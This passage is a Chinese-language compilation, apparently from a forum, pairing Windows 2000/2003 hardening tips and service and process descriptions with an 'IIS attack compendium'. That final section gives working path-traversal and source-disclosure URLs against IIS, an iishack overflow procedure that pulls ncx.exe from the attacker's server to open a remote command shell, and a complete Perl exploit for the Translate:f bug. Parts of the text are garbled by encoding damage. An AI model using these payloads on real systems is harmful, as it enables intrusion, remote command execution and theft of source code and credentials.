cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 恢复网络用户、本地用户在命令行和gui下使用tftp32.exe
----------------------------------------
【四、重要文件名加密[NTFS格式]】
此命令的用途可加密windows的密码档,QQ密码档等等^.^
命令行方式
加密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名(或文件夹名)”。
解密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名(或文件夹名)”。
----------------------------------------
【五、修改注册表防御D.D.O.S】
在注册表HKLMSYSTEMCurrentControlSetServicesTcpipParameters中更改以下值可以帮助你防御一定强度的DoS攻击
SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0
NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0
KeepAliveTime REG_DWORD 300,000
PerformRouterDiscovery REG_DWORD 0
EnableICMPRedirects REG_DWORD 0
更多新的防御技巧请搜索其他信息,
由于本人不敢拿自己的硬盘开玩笑,所以没做实验... ...
----------------------------------------
【六、打造更安全的防火墙】
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 本人现将自己所知道的端口公布如下(如果觉得还有危险需要过滤的,请联系本人:OICQ 250875628
端口 协议 应用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
那么,我们根据自己的经验,将下面的端口关闭
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了
----------------------------------------
【七、保护个人隐私】
1、TT浏览器
选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的.
TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染,你删除掉又重新安装一个就是.[TT就是腾讯的浏览器](不过有些人喜欢用MyIE,因为我使用的时间和对他的了解不是很深吧,感觉不出他对安全方面有什么优势一_一~,希望支持MyIE的朋友不要揍我,否则我会哭... ...)
2、移动“我的文档”
进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移动”按钮,
选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪,桌面、开始等处都看不到了,
建议经常使用的朋友做个快捷方式放到桌面上。
3、移动IE临时文件
进入“开始→控制面板→Internet 选项”,在“常规”选项卡的“Internet 文件”栏里点“设置”按钮,
在弹出窗体中点“移动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”,
系统会自动重新登录。点本地连接,高级,安全日志,把日志的目录更改专门分配日志的目录,
不建议是C:再重新分配日志存储值的大小,我是设置了10000KB
----------------------------------------
【八、第三方软件的帮助】
防火墙:天网防火墙(建议)[二道贩子注:winxp以上可以考虑用系统自带的防火墙,win2000可以考虑用IPSEC,是个锻炼的机会)
杀毒软件:卡巴斯基
二道贩子后注:
现在黑客的攻击有从传统的系统漏洞转向了你的浏览器,所以要在升级一些传统漏洞补丁的同时要注意你的浏览器.
----------------------------------------
【声明】
根据windows2003的版本不同,有时可以自己调整一下顺序,
Windows 2000运行进程详解
Svchost.exe
Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%\system32文件夹下。在启动的时候,Svchost.exe检查注册表中的位置来构建需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务,
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。
Svchost.exe 组是用下面的注册表值来识别。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
每个在这个键下的值代表一个独立的Svchost组,并且当你正在看活动的进程时,它显示作为一个单独的
例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个
或多个从注册表值中选取的服务名,这个服务的参数值包含了一个ServiceDLL值。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service
更多的信息
为了能看到正在运行在Svchost列表中的服务。
开始-运行-敲入cmd
然后在敲入 tlist -s (tlist 应该是win2k工具箱里的冬冬)
Tlist 显示桓龌疃痰牧斜怼??-s 显示在每个进程中的活动服务列表。如果想知道更多的关于
进程的信息,可以敲 tlist pid。
Tlist 显示Svchost.exe运行的两个例子。
0 System Process
8 System
132 smss.exe
160 csrss.exe Title:
180 winlogon.exe Title: NetDDE Agent
208services.exe
Svcs: AppMgmt, Browser, Dhcp, dmserver, Dnscache, Eventlog, lanmanserver, LanmanWorkstation, LmHosts, Messenger, PlugPlay, ProtectedStorage, seclogon, TrkWks, W32Time, Wmi
220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs
404 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
544 cisvc.exe Svcs: cisvc
556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv
580 regsvc.exe Svcs: RemoteRegistry
596 mstask.exe Svcs: Schedule
660 snmp.exe Svcs: SNMP
728 winmgmt.exe Svcs: WinMgmt
852 cidaemon.exe Title: OleMainThreadWndName
812 explorer.exe Title: Program Manager
1032 OSA.EXE Title: Reminder
1300 cmd.exe Title: D:\WINNT5\System32\cmd.exe - tlist -s
1080 MAPISP32.EXE Title: WMS Idle
1264 rundll32.exe Title:
1000 mmc.exe Title: Device Manager
1144 tlist.exe
在这个例子中注册表设置了两个组。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost:
netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
rpcss :Reg_Multi_SZ: RpcSs
smss.exe
csrss.exe
这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统
必须一直运行。csrss 负责控制windows,创建或者删除线程和一些16位的虚拟MS-DOS环境。
explorer.exe
这是一个用户的shell(我实在是不知道怎么翻译shell),在我们看起来就像任务条,桌面等等。这个
进程并不是像你想象的那样是作为一个重要的进程运行在windows中,你可以从任务管理器中停掉它,或者重新启动。
通常不会对系统产生什么负面影响。
internat.exe
这个进程是可以从任务管理器中关掉的。
internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。
internat.exe 加载“EN”图标进入系统的图标区,允许使用者可以很容易的转换不同的输入点。
当进程停掉的时候,图标就会消失,但是输入点仍然可以通过控制面板来改变。
lsass.exe
这个进程是不可以从任务管理器中关掉的。
这是一个本地的安全授权服务,并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是
通过使用授权的包,例如默认的msgina.dll来执行的。如果授权是成功的,lsass就会产生用户的进入
令牌,令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。
mstask.exe
这个进程是不可以从任务管理器中关掉的。
这是一个任务调度服务,负责用户事先决定在某一时间运行的任务的运行。
smss.exe
这个进程是不可以从任务管理器中关掉的。
这是一个会话管理子系统,负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的,
包括已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。在它启动这些
进程后,它等待Winlogon或者Csrss结束。如果这些过程时正常的,系统就关掉了。如果发生了什么
不可预料的事情,smss.exe就会让系统停止响应(就是挂起)。
spoolsv.exe
这个进程是不可以从任务管理器中关掉的。
缓冲(spooler)服务是管理缓冲池中的打印和传真作业。
service.exe
这个进程是不可以从任务管理器中关掉的。
大多数的系统核心模式进程是作为系统进程在运行。
System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上,并在系统不处理其他线程的时候分派处理器的时间。
taskmagr.exe
这个进程是可以在任务管理器中关掉的。
这个进程就是任务管理器。
winlogon.exe
这个进程是管理用户登录和推出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了,显示安全对话框。
winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。
WIN2000的常用服务列表
WIN2000提供服务的列表,包括详细的描述,服务名称==>>,显示名称,可执行文件的路径!
在命令提示符下可以启动,停止下面的服务。
net start 服务名称==>>
net start 停止服务
例:
net start Telnet
开启了Telnet服务,我们就可以用:telnet ip
net start Telnet
停止Telnet服务
=========================================================================
服务名称==>>:Alerter
显示名称:Alerter
描述:通知所选用户和计算机有关系统管理级警报。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:AppMgmt
显示名称:Application Management
描述:提供软件安装服务,诸如分派,发行以及删除。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称==>>:Ati HotKey Poller
显示名称:Ati HotKey Poller
描述:[]
可执行文件的路径:C:\WINNT\System32\Ati2evxx.exe
服务名称==>>:ClipSrv
显示名称:ClipBook
描述:支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。
可执行文件的路径:C:\WINNT\system32\clipsrv.exe
服务名称==>>:EventSystem
显示名称:COM+ Event System
描述:提供事件的自动发布到订阅 COM 组件。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:Browser
显示名称:Computer Browser
描述:维护网络上计算机的最新列表以及提供这个列表给请求的程序。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:Dhcp
显示名称:DHCP Client
描述:通过注册和更改 IP 地址以及 DNS 名称来管理网络配置。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:TrkWks
显示名称:Distributed Link Tracking Client
描述:当文件在网络域的 NTFS 卷中移动时发送通知。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称==>>:MSDTC
显示名称:Distributed Transaction Coordinator
描述:并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管
理器。
可执行文件的路径:C:\WINNT\System32\msdtc.exe
服务名称==>>:Dnscache
显示名称:DNS Client
描述:解析和缓冲域名系统 (DNS) 名称。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:Eventlog
显示名称:Event Log
描述:记录程序和 Windows 发送的事件消息。事件日志包含对诊断问题有所帮助的信息。您
可以在“事件查看器”中查看报告。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称==>>:Fax
显示名称:Fax Service
描述:帮助您发送和接收传真
可执行文件的路径:C:\WINNT\system32\faxsvc.exe
服务名称==>>:MSFTPSVC
显示名称:FTP Publishing Service
描述:通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
服务名称==>>:IISADMIN
显示名称:IIS Admin Service
描述:允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
服务名称==>>:cisvc
显示名称:Indexing Service
描述:本地和远程计算机上文件的索引内容和属性;通过灵活查询语言提供文件快速访问。
可执行文件的路径:C:\WINNT\System32\cisvc.exe
服务名称==>>:Irmon
显示名称:Infrared Monitor
描述:支持安装在这台计算机上的红外设备并且检测在有效范围内的其它红外设备。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:SharedAccess
显示名称:Internet Connection Sharing
描述:为通过拨号网络连接的家庭网络中所有计算机提供网络地址转换、定址以及名称解析服务。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:PolicyAgent
显示名称:IPSEC Policy Agent
描述:管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
可执行文件的路径:C:\WINNT\System32\lsass.exe
服务名称==>>:dmserver
显示名称:Logical Disk Manager
描述:逻辑磁盘管理器监视狗服务
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:dmadmin
显示名称:Logical Disk Manager Administrative Service
描述:磁盘管理请求的系统管理服务
可执行文件的路径:C:\WINNT\System32\dmadmin.exe /com
服务名称==>>:Messenger
显示名称:Messenger
描述:发送和接收系统管理员或者“警报器”服务传递的消息。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:MSUpdate
显示名称:Microsoft Windows Update Service
描述:Microsoft(R) Windows Update
可执行文件的路径:C:\WINNT\System32\wupdmgr32.exe
服务名称==>>:Netlogon
显示名称:Net Logon
描述:支持网络上计算机 pass-through 帐户登录身份验证事件。
可执行文件的路径:C:\WINNT\System32\lsass.exe
服务名称==>>:mnmsrvc
显示名称:NetMeeting Remote Desktop Sharing
描述:允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
可执行文件的路径:C:\WINNT\System32\mnmsrvc.exe
服务名称==>>:Netman
显示名称:Network Connections
描述:管理“网络和拨号连接”文件夹中对象,在其中您可以查看局域网和远程连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:NetDDE
显示名称:Network DDE
描述:提供动态数据交换 (DDE) 的网络传输和安全特性。
可执行文件的路径:C:\WINNT\system32\netdde.exe
服务名称==>>:NetDDEdsdm
显示名称:Network DDE DSDM
描述:管理网络 DDE 的共享动态数据交换
可执行文件的路径:C:\WINNT\system32\netdde.exe
服务名称==>>:NtLmSsp
显示名称:NT LM Security Support Provider
描述:为使用传输协议而不是命名管道的远程过程调用(RPC)程序提供安全机制。
可执行文件的路径:C:\WINNT\System32\lsass.exe
服务名称==>>:SysmonLog
显示名称:Performance Logs and Alerts
描述:配置性能日志和警报。
可执行文件的路径:C:\WINNT\system32\smlogsvc.exe
服务名称==>>:PlugPlay
显示名称:Plug and Play
描述:管理设备安装以及配置,并且通知程序关于设备更改的情况。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称==>>:Spooler
显示名称:Print Spooler
描述:将文件加载到内存中以便迟后打印。
可执行文件的路径:C:\WINNT\system32\spoolsv.exe
服务名称==>>:ProtectedStorage
显示名称:Protected Storage
描述:提供对敏感数据(如私钥)的保护性存储,以便防止未授权的服务,过程或用户对其的非
法访问。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称==>>:RSVP
显示名称:QoS RSVP
描述:为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。
可执行文件的路径:C:\WINNT\System32\rsvp.exe -s
服务名称==>>:RasAuto
显示名称:Remote Access Auto Connection Manager
描述:无论什么时候当某个程序引用一个远程 DNS 或 NetBIOS 名或者地址就创建一个到远程
网络的连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:RasMan
显示名称:Remote Access Connection Manager
描述:创建网络连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:RpcSs
显示名称:Remote Procedure Call (RPC)
描述:提供终结点映射程序 (endpoint mapper) 以及其它 RPC 服务。
可执行文件的路径:C:\WINNT\system32\svchost -k rpcss
服务名称==>>:RpcLocator
显示名称:Remote Procedure Call (RPC) Locator
描述:管理 RPC 名称服务数据库。
可执行文件的路径:C:\WINNT\System32\locator.exe
服务名称==>>:RemoteRegistry
显示名称:Remote Registry Service
描述:允许远程注册表操作。
可执行文件的路径:C:\WINNT\system32\regsvc.exe
服务名称==>>:NtmsSvc
显示名称:Removable Storage
描述:管理可移动媒体、驱动程序和库。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:RemoteAccess
显示名称:Routing and Remote Access
描述:在局域网以及广域网环境中为企业提供路由服务。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:seclogon
显示名称:RunAs Service
描述:在不同凭据下启用启动过程
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称==>>:SamSs
显示名称:Security Accounts Manager
描述:存储本地用户帐户的安全信息。
可执行文件的路径:C:\WINNT\system32\lsass.exe
服务名称==>>:lanmanserver
显示名称:Server
描述:提供 RPC 支持、文件、打印以及命名管道共享。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:Service Support
显示名称:Service Support
描述:Windows Service Support
可执行文件的路径:C:\WINNT\System32\srvsupp.exe
服务名称==>>:SMTPSVC
显示名称:Simple Mail Transport Protocol (SMTP)
描述:跨网传送电子邮件
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
服务名称==>>:SCardSvr
显示名称:Smart Card
描述:对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
可执行文件的路径:C:\WINNT\System32\SCardSvr.exe
服务名称==>>:SCardDrv
显示名称:Smart Card Helper
描述:提供对连接到计算机上旧式智能卡的支持。
可执行文件的路径:C:\WINNT\System32\SCardSvr.exe
服务名称==>>:SENS
显示名称:System Event Notification
描述:跟踪系统事件,如登录 Windows,网络以及电源事件等。将这些事件通知给 COM+ 事件
系统 “订阅者(subscriber)”。
可执行文件的路径:C:\WINNT\system32\svchost.exe -k netsvcs
服务名称==>>:Schedule
显示名称:Task Scheduler
描述:允许程序在指定时间运行。
可执行文件的路径:C:\WINNT\system32\MSTask.exe
服务名称==>>:LmHosts
显示名称:TCP/IP NetBIOS Helper Service
描述:允许对“TCP/IP 上 NetBIOS (NetBT)”服务以及 NetBIOS 名称解析的支持。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:TapiSrv
显示名称:Telephony
描述:提供 TAPI 的支持,以便程序控制本地计算机,服务器以及 LAN 上的电话设备和基于
IP 的语音连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称==>>:TlntSvr
显示名称:Telnet
描述:允许远程用户登录到系统并且使用命令行运行控制台程序。
可执行文件的路径:C:\WINNT\system32\tlntsvr.exe
服务名称==>>:UPS
显示名称:Uninterruptible Power Supply
描述:管理连接到计算机的不间断电源(UPS)。
可执行文件的路径:C:\WINNT\System32\ups.exe
服务名称==>>:UtilMan
显示名称:Utility Manager
描述:从一个窗口中启动和配置辅助工具
可执行文件的路径:C:\WINNT\System32\UtilMan.exe
服务名称==>>:MSIServer
显示名称:Windows Installer
描述:根据包含在 .MSI 文件中的指示来安装、修复或删除软件。
可执行文件的路径:C:\WINNT\System32\MsiExec.exe /V
服务名称==>>:WinMgmt
显示名称:Windows Management Instrumentation
描述:提供系统管理信息。
可执行文件的路径:C:\WINNT\System32\WBEM\WinMgmt.exe
服务名称==>>:Wmi
显示名称:Windows Management Instrumentation Driver Extensions
描述:与驱动程序间交换系统管理信息。
可执行文件的路径:C:\WINNT\system32\Services.exe
服务名称==>>:W32Time
显示名称:Windows Time
描述:设置计算机时钟。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:WMDM PMSP Service
显示名称:WMDM PMSP Service
描述:WMDM PMSP Service
可执行文件的路径:C:\WINNT\System32\mspmspsv.exe
服务名称==>>:lanmanworkstation
显示名称:Workstation
描述:提供网络链结和通讯。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称==>>:W3SVC
显示名称:World Wide Web Publishing Service
描述:通过 Internet 信息服务的管理单元提供 Web 连接和管理。
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
IIS攻击大全
1. 介绍
这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的。如果想方便一些,下载一些WWW、CGI扫描器来辅助检查。
而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:
telnet 《目标机》 80
GET HEAD / HTTP/1.0
就可以返回一些域名和WEB服务程序版本,如果有些服务器把WEB服务运行在8080,81,8000,8001口,你就TELNET相应的口上。
2.常见漏洞
(1)、Null.htw
IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞,即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码, global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制,进行逻辑分区和ROOT目录的访问。而这个"hit-highlighting"功能在Index Server中没有充分防止各种类型文件的请求,所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量:
CiWebhitsfile
CiRestriction
CiHiliteType
你可通过下列方法传递变量来获得如default.asp的源代码:
http://www.目标机.com/null.htw?CiWebhitsfile=/default.asp%20&%20
CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。
(2)、MDAC- 执行本地命令漏洞
这个漏洞出现得比较早,但在全球范围内,可能还有好多IIS WEB服务器存在这个漏洞,就像在今天,还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞,可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,在默认情况下是SYSTEM用户。我们可以通过以下办法测试本机是否存在这个漏洞:
c:\》nc -nw -w 2 《目标机》 80
GET /msadc/msadcs.dll HTTP
如果你得到下面的信息:
application/x_varg
就很有可能存在此漏洞且没有打上补丁,你可以使用rain forest puppy网站的两个程序进行测(www.wiretrip.net/rfp)==》mdac.pl和msadc2.pl。
(3)、ASP Dot Bug
这个漏洞出现得比较早了,是Lopht小组在1997年发现的缺陷,这个漏洞也是泄露ASP源代码给攻击者,一般在IIS3.0上存在此漏洞,在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。http://www.目标机.com/sample.asp.
(4)、idc & .ida Bugs
这个漏洞实际上类似ASP dot 漏洞,其能在IIS4.0上显示其WEB目录信息,很奇怪有些人还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端。
http://www.目标机.com/anything.idc 或者 anything.idq
(5)、+.htr Bug
这个漏洞是由NSFOCUS发现的,对有些ASA和ASP追加+.htr的URL请求就会导致文件源代码的泄露:
http://www.目标机.com/global.asa+.htr
(6)、NT Site Server Adsamples 漏洞
通过请求site.csc,一般保存在/adsamples/config/site.csc中,攻击者可能获得一些如数据库中的DSN,UID和PASS的一些信息,如:
http://www.目标机.com/adsamples/config/site.csc
(7)、IIS HACK
有人发现了一个IIS4.0的缓冲溢出漏洞,可以允许用户上载程序,如上载netcat到目标服务器,并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到站点www.technotronic.com中去下载,另外你还需要一台自己的WEB服务器,也可以是虚拟服务器哦。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:
c:\》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:\》nc 《目标机》 80
如果溢出点正确,你就可以看到目标机器的命令行提示,并且是远程管理权限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序,但不是默认安装的,这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是,这个查看器并没有很好地限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:
1.Codebrws.asp 和 Showcode.asp默认情况下不安装。
2.漏洞仅允许查看文件内容。
3.这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。
4.只允许同一分区下的文件可以被查看(所以把IIS目录和WINNT分区安装是个不错的方案,这样也可能比较好的防止最新的IIS5.0的unicode漏洞).
5.攻击者需要知道请求的文件名。
例如你发现存在这个文件并符合上面的要求,你可以请求如下的命令:
http://www.目标机.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
你就可以查看到codebrws.asp的源代码了。
你也可以使用showcode.asp来查看文件:
http://www.目标机.com/msadc/samples/selector/showcode.asp?
source=/msadc/../../../../../winnt/win.ini
当然你也可以查看一些FTP信息来获得其他的目标管理员经常使用的机器,或许其他的机器的安全性比WEB服务器差,如:http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?
source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log
(8)、webhits.dll & .htw
这个hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)其原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致可以查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://www.目标机.com/nosuchfile.htw
如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid
这就表示你存在这个漏洞。
这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.目标机.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。
(9)、ASP Alternate Data Streams(::$DATA)
$DATA这个漏洞是在1998年中期公布的,$DATA是在NTFS文件系统中存储在文件里面的main data stream属性,通过建立一个特殊格式的URL,就可能使用IIS在浏览器中访问这个data stream(数据流),这样做也就显示了文件代码中这些data stream(数据流)和任何文件所包含的数据代码。
其中这个漏洞需要下面的几个限制,一个是要显示的这个文件需要保存在NTFS文件分区(幸好为了"安全"好多服务器设置了NTFS格式),第二是文件需要被ACL设置为全局可读。而且未授权用户需要知道要查看文件名的名字,WIN NT中的IIS1.0, 2.0, 3.0和4.0都存在此问题。微软提供了一个IIS3.0和4.0的版本补丁,要查看一些.asp文件的内容,你可以请求如下的URL:
http://www.目标机.com/default.asp::$DATA 你就得到了源代码。你要了解下NTFS文件系统中的数据流问题,你或许可以看看这文章:
http://focus.silversand.net/newsite/skill/ntfs.txt
(10)、ISM.DLL 缓冲截断漏洞
这个漏洞存在于IIS4.0和5.0中,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLL ISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL程序把传递过来的文件打开和执行,但在ISM.DLL 截断信息之前,缓冲区发送一个断开的 .Htr 并会延迟一段时间来返回一些你要打开的文件内容。可是要注意,除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL 第一次装入内存时工作。
http://www.目标机.com/global.asa%20%20(...《=230)global.asa.htr
(11)、存在的一些暴力破解威胁.htr程序
IIS4.0中包含一个严重漏洞就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
这样,攻击者可以通过暴力来猜测你的密码。如果你没有使用这个服务,请立即删除这个目录。
(12)、Translate:f Bug
这个漏洞发布于2000年8月15号(www.securityfocus.com/bid/1578),其问题是存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中,当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS4.0上,因此在IIS4.0上也有这个漏洞,你可而已使用下面的脚本来利用这个漏洞:
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV 《 1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, "》$server.txt");
print "Dumping $cm to $server.txt \n";
while(《SOCK》) {
print OUT 《SOCK》;
}
sub howto {
print "type as follows: Trans.pl www.目标机.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}
你可以使用下面的方法来获得源代码:Trasn.pl www.目标机.com default.asp
